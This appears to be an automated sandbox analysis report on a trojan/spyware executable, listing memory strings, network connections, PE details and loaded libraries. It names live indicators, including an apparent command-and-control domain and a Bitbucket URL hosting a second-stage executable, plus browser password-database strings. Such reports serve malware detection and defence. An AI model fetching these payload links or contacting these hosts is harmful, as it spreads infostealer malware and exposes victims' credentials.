Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTru
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: OtHVIQ2ge4.exe, 00000000.00000003.1668686461.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E17000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1928241920.0000000006499000.00000002.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1668516238.0000000005E73000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.pro
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669516961.0000000001754000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923369236.000000000135A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe0
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeagerQ
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exef
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: OtHVIQ2ge4.exe, 00000000.00000003.1571967887.0000000001762000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669516961.0000000001754000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1437414630.0000000005E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/
Source: OtHVIQ2ge4.exe, 00000000.00000003.1412529541.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/RC
Source: OtHVIQ2ge4.exe, 00000000.00000003.1488527580.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488413895.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488229578.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/Uu
Source: OtHVIQ2ge4.exe, 00000000.00000003.1412529541.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515056514.0000000001755000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515380529.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1533192683.000000000170B000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/api
Source: OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/api-Age
Source: OtHVIQ2ge4.exe, 00000000.00000003.1515056514.0000000001755000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/apik
Source: OtHVIQ2ge4.exe, 00000000.00000003.1412529541.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/apip
Source: OtHVIQ2ge4.exe, 00000000.00000003.1465585068.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488527580.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488413895.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1462101979.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488229578.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1460907654.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/ry
Source: OtHVIQ2ge4.exe, 00000000.00000003.1515056514.0000000001762000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1519646355.0000000001762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/s
Source: OtHVIQ2ge4.exe, 00000000.00000003.1490713276.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat:443/api
Source: OtHVIQ2ge4.exe, 00000000.00000003.1515306602.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572011566.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490713276.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat:443/apin.txtPK
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.9:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.75.84:443 -> 192.168.2.9:49783 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: OtHVIQ2ge4.exe	Static PE information: section name:
Source: OtHVIQ2ge4.exe	Static PE information: section name: .rsrc
Source: OtHVIQ2ge4.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_017130AE	0_3_017130AE
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_01713701	0_3_01713701
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_01713500	0_3_01713500

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7832 -s 1936

Source: OtHVIQ2ge4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: OtHVIQ2ge4.exe

Static PE information: Section: ZLIB complexity 0.9973512414383562

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7832

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c9c67909-b42d-472e-9381-c3db6b570ebe

Jump to behavior

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: OtHVIQ2ge4.exe, 00000000.00000003.1438313238.0000000005E42000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414543209.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414750808.0000000005DAD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1437984384.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: OtHVIQ2ge4.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

File read: C:\Users\user\Desktop\OtHVIQ2ge4.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\OtHVIQ2ge4.exe "C:\Users\user\Desktop\OtHVIQ2ge4.exe"
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7832 -s 1936

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: mskeyprotect.dll	Jump to behavior
